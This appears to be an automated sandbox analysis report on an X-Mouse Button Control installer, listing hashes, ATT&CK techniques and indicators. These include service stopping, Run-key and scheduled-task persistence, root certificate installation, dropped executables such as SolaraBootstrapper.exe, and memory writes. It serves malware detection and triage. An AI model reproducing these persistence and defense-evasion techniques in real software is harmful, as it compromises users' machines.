2240bf5fb5d80938b0676c46ef9f84bc1739c32f60c473ff85e530ae0eca2818

Resubmissions

06-01-2025 20:05

250106-ytzahswnax 7

06-01-2025 20:03

250106-ys6cfaykcj 7

06-01-2025 19:56

250106-ynwmfawle1 8

Analysis

max time kernel
147s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
06-01-2025 19:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XMouseButtonControlSetup.2.20.5.exe
Size

2.9MB
MD5

2e9725bc1d71ad1b8006dfc5a2510f88
SHA1

6e1f7d12881696944bf5e030a7d131b969de0c6c
SHA256

2240bf5fb5d80938b0676c46ef9f84bc1739c32f60c473ff85e530ae0eca2818
SHA512

62bd9cde806f83f911f1068b452084ef2adc01bc0dec2d0f668a781cc0d94e39f6e35618264d8796ca205724725abd40429f463017e6ca5caf7d683429f82d39
SSDEEP

49152:n65SJw48kZN+nCYk7c44+Y0hdwn4Km2A5aT/pVE0hYYajihV2Qso0SWMrboF:tfpeno4oY0QZm2dlNJsrHM4

Score

8^/10

defense_evasion discovery evasion execution persistence phishing

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2444	powershell.EXE
2888	powershell.EXE
2772	powershell.exe
480	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
A potential corporate email address has been identified in the URL: [email protected]
phishing

Executes dropped EXE 3 IoCs

pid	Process
3592	XMouseButtonControl.exe
2060	SolaraBootstrapper.exe
4472	cxxvyevuiied.exe

Loads dropped DLL 10 IoCs

pid	Process
868	XMouseButtonControlSetup.2.20.5.exe
868	XMouseButtonControlSetup.2.20.5.exe
868	XMouseButtonControlSetup.2.20.5.exe
868	XMouseButtonControlSetup.2.20.5.exe
868	XMouseButtonControlSetup.2.20.5.exe
868	XMouseButtonControlSetup.2.20.5.exe
868	XMouseButtonControlSetup.2.20.5.exe
868	XMouseButtonControlSetup.2.20.5.exe
3592	XMouseButtonControl.exe
3592	XMouseButtonControl.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XMouseButtonControl = "C:\\Program Files\\Highresolution Enterprises\\X-Mouse Button Control\\XMouseButtonControl.exe /notportable /delay"	XMouseButtonControlSetup.2.20.5.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	SolaraBootstrapper.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2060 set thread context of 8	2060	SolaraBootstrapper.exe	135

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\changelog.txt	XMouseButtonControlSetup.2.20.5.exe
File created	C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\uninstaller.exe	XMouseButtonControlSetup.2.20.5.exe
File created	C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe	XMouseButtonControlSetup.2.20.5.exe
File created	C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonHook.dll	XMouseButtonControlSetup.2.20.5.exe
File created	C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\BugTrapU-x64.dll	XMouseButtonControlSetup.2.20.5.exe
File created	C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\License.txt	XMouseButtonControlSetup.2.20.5.exe
File created	C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\ChangeLog.txt	XMouseButtonControlSetup.2.20.5.exe
File created	C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\X-Mouse Button Control User Guide.pdf	XMouseButtonControlSetup.2.20.5.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Setup\Scripts\ErrorHandler.cmd	lua.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
244	sc.exe
3464	sc.exe
1464	sc.exe
2064	sc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\SolaraBootstrapper.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XMouseButtonControlSetup.2.20.5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lua.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lua.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop	XMouseButtonControlSetup.2.20.5.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\LowLevelHooksTimeout = "1000"	XMouseButtonControlSetup.2.20.5.exe

Modifies data under HKEY_USERS 40 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe

Modifies registry class 34 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.xmbcs	XMouseButtonControlSetup.2.20.5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.xmbcs\ = "X-Mouse Button Control Application or Window Profile"	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Application or Window Profile	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Settings	XMouseButtonControlSetup.2.20.5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Language Pack\shell\ = "open"	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Language Pack\shell\open	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Application or Window Profile\shell\open\command	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Application or Window Profile\shell	XMouseButtonControlSetup.2.20.5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Settings\shell\ = "open"	XMouseButtonControlSetup.2.20.5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Application or Window Profile\shell\open\command\ = "\"C:\\Program Files\\Highresolution Enterprises\\X-Mouse Button Control\\XMouseButtonControl.exe\" /import:\"%1\""	XMouseButtonControlSetup.2.20.5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Settings\DefaultIcon\ = "C:\\Program Files\\Highresolution Enterprises\\X-Mouse Button Control\\XMouseButtonControl.exe,0"	XMouseButtonControlSetup.2.20.5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.xmbclp\ = "X-Mouse Button Control Language Pack"	XMouseButtonControlSetup.2.20.5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.xmbcp\ = "X-Mouse Button Control Settings"	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Settings\shell	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Settings\shell\open	XMouseButtonControlSetup.2.20.5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Language Pack\DefaultIcon\ = "C:\\Program Files\\Highresolution Enterprises\\X-Mouse Button Control\\XMouseButtonControl.exe,0"	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Application or Window Profile\ = "X-Mouse Button Control Application or Window Profile"	XMouseButtonControlSetup.2.20.5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Application or Window Profile\shell\ = "open"	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.xmbcp	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Settings\DefaultIcon	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.xmbclp	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Language Pack\shell	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Language Pack\shell\open\command	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Application or Window Profile\DefaultIcon	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Application or Window Profile\shell\open	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Settings\shell\open\command	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Language Pack	XMouseButtonControlSetup.2.20.5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Language Pack\ = "X-Mouse Button Control Language Pack"	XMouseButtonControlSetup.2.20.5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Language Pack\shell\open\command\ = "\"C:\\Program Files\\Highresolution Enterprises\\X-Mouse Button Control\\XMouseButtonControl.exe\" /install:\"%1\""	XMouseButtonControlSetup.2.20.5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Application or Window Profile\DefaultIcon\ = "C:\\Program Files\\Highresolution Enterprises\\X-Mouse Button Control\\XMouseButtonControl.exe,0"	XMouseButtonControlSetup.2.20.5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Settings\ = "X-Mouse Button Control Settings"	XMouseButtonControlSetup.2.20.5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Settings\shell\open\command\ = "\"C:\\Program Files\\Highresolution Enterprises\\X-Mouse Button Control\\XMouseButtonControl.exe\" /profile:\"%1\""	XMouseButtonControlSetup.2.20.5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\X-Mouse Button Control Language Pack\DefaultIcon	XMouseButtonControlSetup.2.20.5.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 5c0000000100000004000000000800001900000001000000100000001f7e750b566b128ac0b8d6576d2a70a503000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e1d0000000100000010000000e3f9af952c6df2aaa41706a77a44c2031400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f76200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e0b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b002000430041000000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df1040000000100000010000000d5e98140c51869fc462c8975620faa782000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c	XMouseButtonControl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E	XMouseButtonControl.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 040000000100000010000000d5e98140c51869fc462c8975620faa780f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df153000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b0020004300410000006200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e1400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f71d0000000100000010000000e3f9af952c6df2aaa41706a77a44c20303000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e1900000001000000100000001f7e750b566b128ac0b8d6576d2a70a52000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c	XMouseButtonControl.exe

NTFS ADS 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Solara.zip:Zone.Identifier	msedge.exe
File created	C:\Users\Admin\AppData\Local\ODA3\lua51.dll\:Zone.Identifier:$DATA	lua.exe
File created	C:\Users\Admin\AppData\Local\ODA3\ODA3.exe\:Zone.Identifier:$DATA	lua.exe
File created	C:\Users\Admin\AppData\Local\ODA3\config.txt\:Zone.Identifier:$DATA	lua.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 220267.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\SolaraBootstrapper.exe:Zone.Identifier	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4684	schtasks.exe
3712	schtasks.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
5116	msedge.exe
5116	msedge.exe
5112	msedge.exe
5112	msedge.exe
4664	msedge.exe
4664	msedge.exe
4260	identity_helper.exe
4260	identity_helper.exe
2896	msedge.exe
2896	msedge.exe
2768	msedge.exe
2768	msedge.exe
2052	msedge.exe
2052	msedge.exe
2052	msedge.exe
2052	msedge.exe
2060	SolaraBootstrapper.exe
2772	powershell.exe
2772	powershell.exe
2772	powershell.exe
2060	SolaraBootstrapper.exe
2060	SolaraBootstrapper.exe
2060	SolaraBootstrapper.exe
2060	SolaraBootstrapper.exe
2060	SolaraBootstrapper.exe
2060	SolaraBootstrapper.exe
4472	cxxvyevuiied.exe
480	powershell.exe
480	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs

pid	Process
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeDebugPrivilege	2060	SolaraBootstrapper.exe
Token: SeDebugPrivilege	480	powershell.exe

Suspicious use of FindShellTrayWindow 45 IoCs

pid	Process
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
3592	XMouseButtonControl.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe

Suspicious use of SendNotifyMessage 13 IoCs

pid	Process
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
5112	msedge.exe
3592	XMouseButtonControl.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3592	XMouseButtonControl.exe
3592	XMouseButtonControl.exe
3592	XMouseButtonControl.exe
3592	XMouseButtonControl.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5112 wrote to memory of 3936	5112	msedge.exe	81
PID 5112 wrote to memory of 3936	5112	msedge.exe	81
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
